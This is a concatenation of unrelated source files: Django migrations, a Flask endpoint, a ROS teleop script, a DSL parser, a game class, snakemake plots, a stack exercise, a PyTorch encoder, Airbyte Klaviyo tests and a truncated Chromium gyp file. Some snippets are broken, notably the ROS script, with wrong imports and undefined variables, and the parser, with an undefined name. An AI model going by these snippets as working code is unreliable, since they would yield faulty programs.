('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mini_description', models.CharField(max_length=300)),
('last_name', models.CharField(max_length=300)),
('first_name', models.CharField(max_length=300)),
('position', models.CharField(max_length=300)),
('rating', models.IntegerField(default=0)),
('logo_left', models.ImageField(upload_to='upload')),
('logo_right', models.ImageField(upload_to='upload')),
],
),
migrations.CreateModel(
name='Test',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mini_description', models.CharField(max_length=300)),
('logo', models.ImageField(upload_to='upload')),
('short_description', models.CharField(max_length=300)),
('last_name', models.CharField(max_length=300)),
('first_name', models.CharField(max_length=300)),
('position', models.CharField(max_length=300)),
('rating', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Tip',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('logo', models.ImageField(upload_to='upload')),
('title', models.CharField(max_length=300)),
('mini_description', models.CharField(max_length=300)),
],
),
]
|
from flask import Flask, request, jsonify, make_response
from flask_cors import cross_origin
from datetime import datetime
from dateparser import parse
import holiday_controller as hc
app: Flask = Flask(__name__)
@app.route('/holiday', methods=['POST'])
@cross_origin()
def calculate_pay():
body = request.json
# Get date from request body
holiday: datetime = parse(body['date'])
# Get CSV from request body
csv: str = body['csv']
# Process data
output = hc.process_csv(holiday, csv)
response = jsonify(output)
return response
if __name__ == '__main__':
app.run()
|
#!/usr/bin/env python
# license removed for brevity
import rospy
from std_msgs.msg import String
from geometry.msgs import Twist,Vector3
from sensor.msgs import LaserScan
def getch():
""" Return the next character typed on the keyboard """
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def scan_received(msg, pub):
print "scan received"
desired_distance=1
constant=5
vel=0.0
valid_ranges = []
for i in range(5):
if msg.ranges[i]>0 and msg.ranges[i]<8:
valid_ranges.append(msg.ranges[i])
if len(valid_ranges)>0:
mean_distance=sum(valid_ranges)/float(len(valid_ranges))
error = mean_distance-desired_distance
vel = constant*error
pub.publish(vel)
return vel
def teleop():
pub = rospy.Publisher('cmd_vel', Twist, queue_size=10)
sub = rospy.Subscriber('scan', LaserScan, scan_received, pub)
rospy.init_node('talker', anonymous=True)
r = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
Twist(Vector3(vel,0.0,0.0),Vector3(0.0,0.0,0.0))
# #msg = Twist(Vector3(0.0,0.0,0.0),Vector3(0.0,0.0,0.0))
# ch=getch()
# if ch='u':
# Twist(Vector3(1.0,0.0,0.0),Vector3(0.0,0.0,1.0))
# elif ch='i':
# Twist(Vector3(1.0,0.0,0.0),Vector3(0.0,0.0,0.0))
# elif ch='o':
# Twist(Vector3(1.0,0.0,0.0),Vector3(0.0,0.0,-1.0))
# elif ch='j':
# Twist(Vector3(0.0,0.0,0.0),Vector3(0.0,0.0,1.0))
# elif ch='k':
# Twist(Vector3(0.0,0.0,0.0),Vector3(0.0,0.0,0.0))
# elif ch='l':
# Twist(Vector3(0.0,0.0,0.0),Vector3(0.0,0.0,-1.0))
# elif ch='n':
# Twist(Vector3(-1.0,0.0,0.0),Vector3(0.0,0.0,1.0))
# elif ch='m':
# Twist(Vector3(-1.0,0.0,0.0),Vector3(0.0,0.0,0.0))
# elif ch=',':
# Twist(Vector3(-1.0,0.0,0.0),Vector3(0.0,0.0,-1.0))
# elif ch='q':
# break
pub.publish(msg)
r.sleep()
if __name__ == '__main__':
try:
teleop()
except rospy.ROSInterruptException: pass |
import os
import sys
import re
import subprocess
import shlex
import fcntl
import time
class Parser:
def __init__(self, data, debug=False):
self.data = data
self.line_number = 0
self.pipes = {}
self.main = []
self.capture_pipes = False
self.capture_main = False
self.namespace = ''
self.namespace_def = ''
self.debug = debug
self._parse()
def _error(self, enumber, msg):
print('E-PARSER(%d): Line %d: %s' % (enumber, self.line_number, msg))
sys.exit(1)
def _parse_pipes(self, line):
if not re.search('^pipes .*:$', line):
return False
self.capture_pipes = True
self.namespace = re.sub('^pipes ', '', line).replace(':', '').strip()
if self.namespace in self.pipes:
self._error(1, 'Namespace previously defined on line %d: %s' % (pipes[self.namespace]['line'], self.namespace))
self.pipes[self.namespace] = {'line':self.line_number, 'pipes':{}}
return True
def _capture_pipes(self, line):
if not self.capture_pipes or not self.namespace:
return False
if line.strip() == '':
return True
# Get namespace.pipe name
if re.search('^ [0-9a-zA-Z_-]+:$', line):
self.namespace_def = line.strip().split(':')[0]
self.pipes[self.namespace]['pipes'][self.namespace_def] = {'line':self.line_number, 'type':None, 'path':None, 'args':[]}
# Get namespace.pipe definition
elif re.search('^ [a-zA-Z0-9]', line):
try:
(dtype, dpath, dargs) = line.strip().split(' ', 2)
dargs = dargs.split(' ')
except:
try:
(dtype, dpath) = line.strip().split(' ', 1)
dargs = []
except:
self._error(2, 'Failed to parse namespace.pipe definition "%s.%s":\n\t"%s"' % (
self.namespace, self.namespace_def, line))
self.pipes[self.namespace]['pipes'][self.namespace_def]['type'] = dtype
self.pipes[self.namespace]['pipes'][self.namespace_def]['path'] = dpath
self.pipes[self.namespace]['pipes'][self.namespace_def]['args'] = dargs
else:
self.capture_pipes = False
if self.capture_pipes:
return True
return False
def _parse_main(self, line):
if not re.search('^main:$', line.strip()):
return False
self.capture_pipes = False
self.capture_main = True
return True
def _capture_main(self, line):
if not self.capture_main:
return False
parts = line.split('->')
chain = []
for part in parts:
if part.strip() == '':
continue
if '.' in part:
(self.namespace, self.func) = part.strip().split('::', 1)[0].split('.', 1)
self.func = self.func.strip()
args = []
if '(' in part:
self.func = self.func.split('(', 1)[0]
args = part.split('(', 1)[1]
args = re.sub('\) |\) &|\)$', '', args)
args = args.split(', ')
threaded = False
if re.search('.*&$', self.func):
self.func = self.func.rsplit('&', 1)[0].strip()
threaded = True
if not self.namespace in self.pipes:
self._error(3, 'Failed to find namespace %s with pipe %s' % (self.namespace, self.func))
# validate args exist in definition
dargs = []
aargs = []
for arg in args:
if not '=' in arg:
self._error(4, 'Invalid argument format. Expected arg=value:\n\t"%s"' % (line))
aargs.append(arg.split('::')[0].strip().split('='))
arg = arg.split('=')[0]
dargs.append(arg)
if not self.func in self.pipes[self.namespace]['pipes']:
self._error(11, 'Could not find pipe "%s" in namespace "%s":\n\t"%s"' % (
self.func, self.namespace, line))
if not arg in self.pipes[self.namespace]['pipes'][self.func]['args']:
self._error(5, 'Invalid argument name "%s" to %s.%s:\n\t"%s"' % (
arg, self.namespace, self.func, line))
# check for missing args
for arg in self.pipes[self.namespace]['pipes'][self.func]['args']:
if arg == '*':
continue
if not arg in dargs:
self._error(6, 'Missing argument named "%s" to %s.%s:\n\t"%s"' % (
arg, self.namespace, self.func, line))
d = {'type':'pipe', 'namespace':self.namespace, 'func':self.func, 'line':self.line_number,
'value':None, 'args':aargs, 'thread':threaded}
chain.append(d)
elif not '.' in part and not '(' in part:
var = part.strip()
if var == 'wait':
thread_wait = 'wait'
else:
thread_wait = False
d = {'type':'var', 'namespace':None, 'func':None, 'value':var, 'line':self.line_number, 'args':None,
'thread':thread_wait}
# Check if var exists if it's item 0
if len(chain) < 1 and var != 'wait':
found = False
for m in self.main:
for x in m:
if x['type'] == 'var' and x['value'] == var:
found = True
if not found:
self._error(7, 'Could not find previously defined variable named "%s":\n\t"%s"' % (var, line))
chain.append(d)
else:
self._error(8, 'Parser error:\n\t"%s"\n\t"%s"' % (line, part))
# Capture assignment
if '::' in part:
var = part.split('::')[1].strip()
var = var.split(' ')[0]
d = {'type':'var', 'namespace':None, 'func':None, 'value':var, 'line':self.line_number, 'args':None, 'thread':False}
chain.append(d)
if re.search('&$', part):
d = {'type':'var', 'thread': True, 'namespace':None, 'func':None, 'value':None,
'line':self.line_number, 'args':None}
chain.append(d)
if chain:
self.main.append(chain)
return True
def _parse(self):
for line in self.data:
self.line_number += 1
if re.search('^(\s+)?#', line): continue
if self._parse_pipes(line): continue
if self._capture_pipes(line): continue
if self._parse_main(line): continue
if self._capture_main(line): continue
if line.strip() != '':
self._error(9, 'Invalid format:\n\t"%s"' % (line))
sys.exit(1)
|
import ComputerPlayer as cp
class HumanPlayer(cp.ComputerPlayer):
"""
Human player - interpret events from game
"""
def __init__(self, game, board):
super().__init__(game, board)
def __str__(self):
return (self.__class__.__name__ + ": WhatStrategy Dunno")
def taketurn(self, event=None):
import FinalBoardComponent as fbc
assert event is not None
# print("in human taketurn")
disp = event[0]
color = event[1]
# Not sure how this could arrive out of range
preprow = min(max(0, int(event[2])),
fbc.FinalBoardComponent.dimension - 1)
tileset = self.game.chooseoption(disp, color)
self.board.playtiles(preprow, tileset)
|
import json
import pickle
import matplotlib.pyplot as plt
import numpy as np
with open(snakemake.input.units_file,'r') as infile:
units_file = json.load(infile)
with open(snakemake.input.first_passage_times_v2,'rb') as infile:
passage_times = pickle.load(infile)
no_contact_intervals = passage_times['no_contact_intervals']
with_contact_intervals = passage_times['with_contact_intervals']
color_list =['dodgerblue', 'orangered','limegreen','magenta']
R = snakemake.config['DSB_simulation_parameters']['contact_radii_for_first_passage_times']
loop_size = ['all'] # loop size in which DSB occurs, in the unit of # monomers
dt_min = units_file['seconds_per_sim_dt']['internal TAD']/60
dx_nm = units_file['nanometers_per_monomer']['internal TAD']
first_protein_arrival_time = 1/dt_min # use ku70/80 arrival time to estimate when the two DSB ends become sticky (in simulation time unit)
bin_edge_0 = np.arange(1,10)
bin_edge= np.hstack((bin_edge_0,bin_edge_0*10,bin_edge_0*100,bin_edge_0*1000,bin_edge_0*10000,bin_edge_0*100000))
bin_edge=bin_edge.tolist()
try:
x = no_contact_intervals[R[0]][loop_size[0]][0]
except KeyError:
plt.figure(figsize=(8,5*len(R)))
for ri, r in enumerate(R):
# first need to consolidate all the times
intervals = []
for idx in no_contact_intervals[r].keys():
intervals.extend(no_contact_intervals[r][idx])
# now, create histograms
plt.subplot(len(R)+1,2,ri*2+1)
min_len = 0
plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)')
plt.xscale('log')
plt.xlabel('Time to recapture (sim units)')
plt.ylabel('Cumulative probability')
plt.ylim([0,1])
if len(intervals)>0:
plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
plt.legend(loc='lower right')
plt.subplot(len(R)+1,2,ri*2+2)
plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm')
plt.xscale('log')
plt.xlabel('Time to recapture (minutes)')
plt.ylim([0,1])
if len(intervals)>0:
plt.xlim([1,(np.max(intervals)+1)*dt_min])
plt.legend(loc='lower right')
plt.savefig(snakemake.output.first_recapture_v2,bbox_inches='tight')
plt.figure(figsize=(8,5*len(R)))
for ri, r in enumerate(R):
# first need to consolidate all the times
intervals = []
for idx in with_contact_intervals[r].keys():
intervals.extend(with_contact_intervals[r][idx])
# now, create histograms
plt.subplot(len(R)+1,2,ri*2+1)
min_len = 0
plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)')
plt.xscale('log')
plt.xlabel('Time to exit (sim units)')
plt.ylabel('Cumulative probability')
plt.ylim([0,1])
if len(intervals)>0:
plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
plt.legend(loc='lower right')
plt.subplot(len(R)+1,2,ri*2+2)
plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm')
plt.xscale('log')
plt.xlabel('Time to exit (minutes)')
plt.ylim([0,1])
if len(intervals)>0:
plt.xlim([1,(np.max(intervals)+1)*dt_min])
plt.legend(loc='lower right')
plt.savefig(snakemake.output.first_exit_v2,bbox_inches='tight')
else:
plt.figure(figsize=(8*len(loop_size),6.8*len(R)))
for ri, r in enumerate(R):
for li,l in enumerate(loop_size):
# first need to consolidate all the times
intervals = []
for idx in no_contact_intervals[r][l].keys():
intervals.extend(no_contact_intervals[r][l][idx])
# now, create histograms
plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+1)
min_len = 0
plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)',color=color_list[li])
plt.xscale('log')
plt.xlabel('Time to recapture (sim units)')
plt.ylabel('Cumulative probability')
plt.ylim([0,1])
plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
plt.legend(loc='lower right')
plt.title('loop size: '+ str(l)+ ' monomers')
plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+2)
plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm',color=color_list[li])
plt.xscale('log')
plt.xlabel('Time to recapture (minutes)')
plt.ylim([0,1])
plt.xlim([1,(np.max(intervals)+1)*dt_min])
plt.legend(loc='lower right')
plt.title('loop size: '+ str(l)+ ' monomers')
plt.savefig(snakemake.output.first_recapture_v2,bbox_inches='tight')
plt.figure(figsize=(8*len(loop_size),6.8*len(R)))
for ri, r in enumerate(R):
for li,l in enumerate(loop_size):
# first need to consolidate all the times
intervals = []
for idx in with_contact_intervals[r][l].keys():
intervals.extend(with_contact_intervals[r][l][idx])
# now, create histograms
plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+1)
min_len = 0
plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)',color=color_list[li])
plt.xscale('log')
plt.xlabel('Time to exit (sim units)')
plt.ylabel('Cumulative probability')
plt.ylim([0,1])
plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
plt.legend(loc='lower right')
plt.title('loop size: '+ str(l)+ ' monomers')
plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+2)
plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm',color=color_list[li])
plt.xscale('log')
plt.xlabel('Time to exit (minutes)')
plt.ylim([0,1])
plt.xlim([1,(np.max(intervals)+1)*dt_min])
plt.legend(loc='lower right')
plt.title('loop size: '+ str(l)+ ' monomers')
plt.savefig(snakemake.output.first_exit_v2,bbox_inches='tight') |
#Write a function rev_string(my_str) that uses a stack to reverse the characters in a string.
class Stack:
def __init__(self):
self.item=[]
def push(self,item):
self.item.insert(0,item)
def __str__(self):
return str(''.join(self.item))
def rev_string(my_str):
reverse=Stack()
for i in my_str:
reverse.push(i)
return reverse
print rev_string('helloworld')
|
import torch
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
from params import *
class EncoderCNN(nn.Module):
def __init__(self, input_size, hidden_size):
super(EncoderCNN, self).__init__()
self.hidden_size=hidden_size
self.embedding = nn.Embedding(input_size, 2*hidden_size)
self.conv1 = nn.Conv1d(2*hidden_size, hidden_size, kernel_size=3, padding=1)
self.conv2 = nn.Conv1d(hidden_size, hidden_size, kernel_size=3, padding=1)
def forward(self,x):
batch_size,seq_len=x.size()
#print(x.shape)
x=self.embedding(x)
#print(x.shape)
hidden = self.conv1(x.transpose(1,2)).transpose(1,2)
#print(hidden.shape)
hidden = F.relu(hidden.contiguous().view(-1, hidden.size(-1))).view(batch_size, seq_len, hidden.size(-1))
#print(hidden.shape)
hidden = self.conv2(hidden.transpose(1,2)).transpose(1,2)
hidden = F.relu(hidden.contiguous().view(-1, hidden.size(-1))).view(batch_size, seq_len, hidden.size(-1))
#print(hidden.shape)
hidden=torch.sum(hidden,dim=0,keepdim=True)
#print(hidden.shape)
return hidden
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from datetime import datetime
from unittest import mock
import pendulum
import pytest
import requests
from pydantic import BaseModel
from source_klaviyo.streams import Events, IncrementalKlaviyoStream, KlaviyoStream, ReverseIncrementalKlaviyoStream
START_DATE = pendulum.datetime(2020, 10, 10)
class SomeStream(KlaviyoStream):
schema = mock.Mock(spec=BaseModel)
def path(self, **kwargs) -> str:
return "sub_path"
class SomeIncrementalStream(IncrementalKlaviyoStream):
schema = mock.Mock(spec=BaseModel)
cursor_field = "updated_at"
def path(self, **kwargs) -> str:
return "sub_path"
class SomeReverseIncrementalStream(ReverseIncrementalKlaviyoStream):
schema = mock.Mock(spec=BaseModel)
cursor_field = "updated_at"
def path(self, **kwargs) -> str:
return "sub_path"
@pytest.fixture(name="response")
def response_fixture(mocker):
return mocker.Mock(spec=requests.Response)
class TestKlaviyoStream:
@pytest.mark.parametrize(
["response_json", "next_page_token"],
[
({"end": 108, "total": 110, "page": 0}, {"page": 1}), # first page
({"end": 108, "total": 110, "page": 9}, {"page": 10}), # has next page
({"end": 109, "total": 110, "page": 9}, None), # last page
],
)
def test_next_page_token(self, response, response_json, next_page_token):
response.json.return_value = response_json
stream = SomeStream(api_key="some_key")
result = stream.next_page_token(response)
assert result == next_page_token
@pytest.mark.parametrize(
["next_page_token", "expected_params"],
[
({"page": 10}, {"api_key": "some_key", "count": 100, "page": 10}),
(None, {"api_key": "some_key", "count": 100}),
],
)
def test_request_params(self, next_page_token, expected_params):
stream = SomeStream(api_key="some_key")
result = stream.request_params(stream_state={}, next_page_token=next_page_token)
assert result == expected_params
def test_parse_response(self, response):
response.json.return_value = {"data": [1, 2, 3, 4, 5]}
stream = SomeStream(api_key="some_key")
result = stream.parse_response(response)
assert list(result) == response.json.return_value["data"]
class TestIncrementalKlaviyoStream:
def test_cursor_field_is_required(self):
with pytest.raises(
TypeError, match="Can't instantiate abstract class IncrementalKlaviyoStream with abstract methods cursor_field, path"
):
IncrementalKlaviyoStream(api_key="some_key", start_date=START_DATE.isoformat())
@pytest.mark.parametrize(
["next_page_token", "stream_state", "expected_params"],
[
# start with start_date
(None, {}, {"api_key": "some_key", "count": 100, "sort": "asc", "since": START_DATE.int_timestamp}),
# pagination overrule
({"since": 123}, {}, {"api_key": "some_key", "count": 100, "sort": "asc", "since": 123}),
# start_date overrule state if state < start_date
(
None,
{"updated_at": START_DATE.int_timestamp - 1},
{"api_key": "some_key", "count": 100, "sort": "asc", "since": START_DATE.int_timestamp},
),
# but pagination still overrule
(
{"since": 123},
{"updated_at": START_DATE.int_timestamp - 1},
{"api_key": "some_key", "count": 100, "sort": "asc", "since": 123},
),
# and again
(
{"since": 123},
{"updated_at": START_DATE.int_timestamp + 1},
{"api_key": "some_key", "count": 100, "sort": "asc", "since": 123},
),
# finally state > start_date and can be used
(
None,
{"updated_at": START_DATE.int_timestamp + 1},
{"api_key": "some_key", "count": 100, "sort": "asc", "since": START_DATE.int_timestamp + 1},
),
],
)
def test_request_params(self, next_page_token, stream_state, expected_params):
stream = SomeIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
result = stream.request_params(stream_state=stream_state, next_page_token=next_page_token)
assert result == expected_params
@pytest.mark.parametrize(
["current_state", "latest_record", "expected_state"],
[
({}, {"updated_at": 10, "some_field": 100}, {"updated_at": 10}),
({"updated_at": 11}, {"updated_at": 10, "some_field": 100}, {"updated_at": 11}),
({"updated_at": 11}, {"updated_at": 12, "some_field": 100}, {"updated_at": 12}),
(
{"updated_at": 12},
{"updated_at": "2021-04-03 17:15:12", "some_field": 100},
{"updated_at": datetime.strptime("2021-04-03 17:15:12", "%Y-%m-%d %H:%M:%S").timestamp()},
),
],
)
def test_get_updated_state(self, current_state, latest_record, expected_state):
stream = SomeIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
result = stream.get_updated_state(current_stream_state=current_state, latest_record=latest_record)
assert result == expected_state
@pytest.mark.parametrize(
["response_json", "next_page_token"],
[
({"next": 10, "total": 110, "page": 9}, {"since": 10}), # has next page
({"total": 110, "page": 9}, None), # last page
],
)
def test_next_page_token(self, response, response_json, next_page_token):
response.json.return_value = response_json
stream = SomeIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
result = stream.next_page_token(response)
assert result == next_page_token
class TestReverseIncrementalKlaviyoStream:
def test_cursor_field_is_required(self):
with pytest.raises(
TypeError,
match="Can't instantiate abstract class ReverseIncrementalKlaviyoStream with abstract methods cursor_field, path",
):
ReverseIncrementalKlaviyoStream(api_key="some_key", start_date=START_DATE.isoformat())
def test_state_checkpoint_interval(self):
stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
assert stream.state_checkpoint_interval == stream.page_size, "reversed stream on the first read commit state for each page"
stream.request_params(stream_state={"updated_at": START_DATE.isoformat()})
assert stream.state_checkpoint_interval is None, "reversed stream should commit state only in the end"
@pytest.mark.parametrize(
["next_page_token", "stream_state", "expected_params"],
[
(None, {}, {"api_key": "some_key", "count": 100, "sort": "asc"}),
({"page": 10}, {}, {"api_key": "some_key", "count": 100, "sort": "asc", "page": 10}),
(None, {"updated_at": START_DATE.isoformat()}, {"api_key": "some_key", "count": 100, "sort": "desc"}),
({"page": 10}, {"updated_at": START_DATE.isoformat()}, {"api_key": "some_key", "count": 100, "sort": "desc", "page": 10}),
],
)
def test_request_params(self, next_page_token, stream_state, expected_params):
stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
result = stream.request_params(stream_state=stream_state, next_page_token=next_page_token)
assert result == expected_params
@pytest.mark.parametrize(
["current_state", "latest_record", "expected_state"],
[
({}, {"updated_at": "2021-01-02T12:13:14", "some_field": 100}, {"updated_at": "2021-01-02T12:13:14+00:00"}),
(
{"updated_at": "2021-02-03T13:14:15"},
{"updated_at": "2021-01-02T12:13:14", "some_field": 100},
{"updated_at": "2021-02-03T13:14:15+00:00"},
),
(
{"updated_at": "2021-02-03T13:14:15"},
{"updated_at": "2021-03-04T14:15:16", "some_field": 100},
{"updated_at": "2021-03-04T14:15:16+00:00"},
),
],
)
def test_get_updated_state(self, current_state, latest_record, expected_state):
stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
result = stream.get_updated_state(current_stream_state=current_state, latest_record=latest_record)
assert result == expected_state
def test_next_page_token(self, response):
ts_below_low_boundary = (START_DATE - pendulum.duration(hours=1)).isoformat()
ts_above_low_boundary = (START_DATE + pendulum.duration(minutes=1)).isoformat()
response.json.return_value = {
"data": [{"updated_at": ts_below_low_boundary}, {"updated_at": ts_above_low_boundary}],
"end": 108,
"total": 110,
"page": 9,
}
stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
stream.request_params(stream_state={"updated_at": ts_below_low_boundary})
next(iter(stream.parse_response(response)))
result = stream.next_page_token(response)
assert result is None
def test_parse_response_read_backward(self, response):
ts_state = START_DATE + pendulum.duration(minutes=30)
ts_below_low_boundary = (ts_state - pendulum.duration(hours=1)).isoformat()
ts_above_low_boundary = (ts_state + pendulum.duration(minutes=1)).isoformat()
response.json.return_value = {
"data": [{"updated_at": ts_above_low_boundary}, {"updated_at": ts_above_low_boundary}, {"updated_at": ts_below_low_boundary}],
"end": 108,
"total": 110,
"page": 9,
}
stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
stream.request_params(stream_state={"updated_at": ts_state.isoformat()})
result = list(stream.parse_response(response))
assert result == response.json.return_value["data"][:2], "should return all records until low boundary reached"
def test_parse_response_read_forward(self, response):
ts_below_low_boundary = (START_DATE - pendulum.duration(hours=1)).isoformat()
ts_above_low_boundary = (START_DATE + pendulum.duration(minutes=1)).isoformat()
response.json.return_value = {
"data": [{"updated_at": ts_below_low_boundary}, {"updated_at": ts_below_low_boundary}, {"updated_at": ts_above_low_boundary}],
"end": 108,
"total": 110,
"page": 9,
}
stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
stream.request_params(stream_state={})
result = list(stream.parse_response(response))
assert result == response.json.return_value["data"][2:], "should all records younger then start_datetime"
class TestEventsStream:
def test_parse_response(self, mocker):
stream = Events(api_key="some_key", start_date=START_DATE.isoformat())
json = {
"data": [
{"event_properties": {"$flow": "ordinary", "$message": "hello"}, "some_key": "some_value"},
{"event_properties": {"$flow": "advanced", "$message": "nice to meet you"}, "another_key": "another_value"},
]
}
records = list(stream.parse_response(mocker.Mock(json=mocker.Mock(return_value=json))))
assert records == [
{
"campaign_id": None,
"event_properties": {"$flow": "ordinary", "$message": "hello"},
"flow_id": "ordinary",
"flow_message_id": "hello",
"some_key": "some_value",
},
{
"another_key": "another_value",
"campaign_id": None,
"event_properties": {"$flow": "advanced", "$message": "nice to meet you"},
"flow_id": "advanced",
"flow_message_id": "nice to meet you",
},
]
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
'pkg-config': 'pkg-config',
'variables': {
'version_py_path': 'tools/build/version.py',
'version_path': 'VERSION',
},
'version_py_path': '<(version_py_path)',
'version_path': '<(version_path)',
'version_full':
'<!(python <(version_py_path) -f <(version_path) -t "@MAJOR@.@MINOR@.@BUILD@.@PATCH@")',
'version_mac_dylib':
'<!(python <(version_py_path) -f <(version_path) -t "@BUILD@.@PATCH_HI@.@PATCH_LO@" -e "PATCH_HI=int(PATCH)/256" -e "PATCH_LO=int(PATCH)%256")',
# Define the common dependencies that contain all the actual
# Chromium functionality. This list gets pulled in below by
# the link of the actual chrome (or chromium) executable on
# Linux or Mac, and into chrome.dll on Windows.
'chromium_dependencies': [
'common',
'browser',
'profile_import',
'renderer',
'syncapi',
'utility',
'service',
'../content/content.gyp:content_gpu',
'../content/content.gyp:content_ppapi_plugin',
'../content/content.gyp:content_worker',
'../printing/printing.gyp:printing',
'../third_party/WebKit/Source/WebKit/chromium/WebKit.gyp:inspector_resources',
],
'nacl_win64_dependencies': [
'common_nacl_win64',
'common_constants_win64',
'installer_util_nacl_win64',
],
'allocator_target': '../base/allocator/allocator.gyp:allocator',
'grit_out_dir': '<(SHARED_INTERMEDIATE_DIR)/chrome',
'protoc_out_dir': '<(SHARED_INTERMEDIATE_DIR)/protoc_out',
'repack_locales_cmd': ['python', 'tools/build/repack_locales.py'],
# TODO: remove this helper when we have loops in GYP
'apply_locales_cmd': ['python', '<(DEPTH)/build/apply_locales.py'],
'conditions': [
['OS=="win"', {
'nacl_defines': [
'NACL_WINDOWS=1',
'NACL_LINUX=0',
'NACL_OSX=0',
],
'platform_locale_settings_grd':
'app/resources/locale_settings_win.grd',
},],
['OS=="linux"', {
'nacl_defines': [
'NACL_WINDOWS=0',
'NACL_LINUX=1',
'NACL_OSX=0',
],
'conditions': [
['chromeos==1', {
'platform_locale_settings_grd':
'app/resources/locale_settings_cros.grd',
}],
['chromeos!=1', {
'platform_locale_settings_grd':
'app/resources/locale_settings_linux.grd',
}],
],
},],
['OS=="mac"', {
'tweak_info_plist_path': 'tools/build/mac/tweak_info_plist',
'nacl_defines': [
'NACL_WINDOWS=0',
'NACL_LINUX=0',
'NACL_OSX=1',
],
'platform_locale_settings_grd':
'app/resources/locale_settings_mac.grd',
'conditions': [
['branding=="Chrome"', {
'mac_bundle_id': 'com.google.Chrome',
'mac_creator': 'rimZ',
# The policy .grd file also needs the bundle id.
'grit_defines': ['-D', 'mac_bundle_id=com.google.Chrome'],
}, { # else: branding!="Chrome"
'mac_bundle_id': 'org.chromium.Chromium',
'mac_creator': 'Cr24',
# The policy .grd file also needs the bundle id.
'grit_defines': ['-D', 'mac_bundle_id=org.chromium.Chromium'],
}], # branding
], # conditions
}], # OS=="mac"
['target_arch=="ia32"', {
'nacl_defines': [
# TODO(gregoryd): consider getting this from NaCl's common.gypi
'NACL_TARGET_SUBARCH=32',
'NACL_BUILD_SUBARCH=32',
],
}],
['target_arch=="x64"', {
'nacl_defines': [
# TODO(gregoryd): consider getting this from NaCl's common.gypi
'NACL_TARGET_SUBARCH=64',
'NACL_BUILD_SUBARCH=64',
],
}],
], # conditions
}, # variables
'includes': [
# Place some targets in gypi files to reduce contention on this file.
# By using an include, we keep everything in a single xcodeproj file.
# Note on Win64 targets: targets that end with win64 be used
# on 64-bit Windows only. Targets that end with nacl_win64 should be used
# by Native Client only.
'app/policy/policy_templates.gypi',
'chrome_browser.gypi',
'chrome_common.gypi',
'chrome_dll.gypi',
'chrome_exe.gypi',
'chrome_installer.gypi',
'chrome_installer_util.gypi',
'chrome_renderer.gypi',
'chrome_tests.gypi',
'common_constants.gypi',
'nacl.gypi',
'preload.gypi',
],
'targets': [
{
# TODO(mark): It would be better if each static library that needed
# to run grit would list its own .grd files, but unfortunately some
# of the static libraries currently have circular dependencies among
# generated headers.
'target_name': 'chrome_resources',
'type': 'none',
'msvs_guid': 'B95AB527-F7DB-41E9-AD91-EB51EE0F56BE',
'actions': [
# Data resources.
{
'action_name': 'autofill_resources',
'variables': {
'grit_grd_file': 'browser/autofill/autofill_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'browser_resources',
'variables': {
'grit_grd_file': 'browser/browser_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'common_resources',
'variables': {
'grit_grd_file': 'common/common_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'renderer_resources',
'variables': {
'grit_grd_file': 'renderer/renderer_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
# TODO(mark): It would be better if each static library that needed
# to run grit would list its own .grd files, but unfortunately some
# of the static libraries currently have circular dependencies among
# generated headers.
'target_name': 'chrome_strings',
'msvs_guid': 'D9DDAF60-663F-49CC-90DC-3D08CC3D1B28',
'type': 'none',
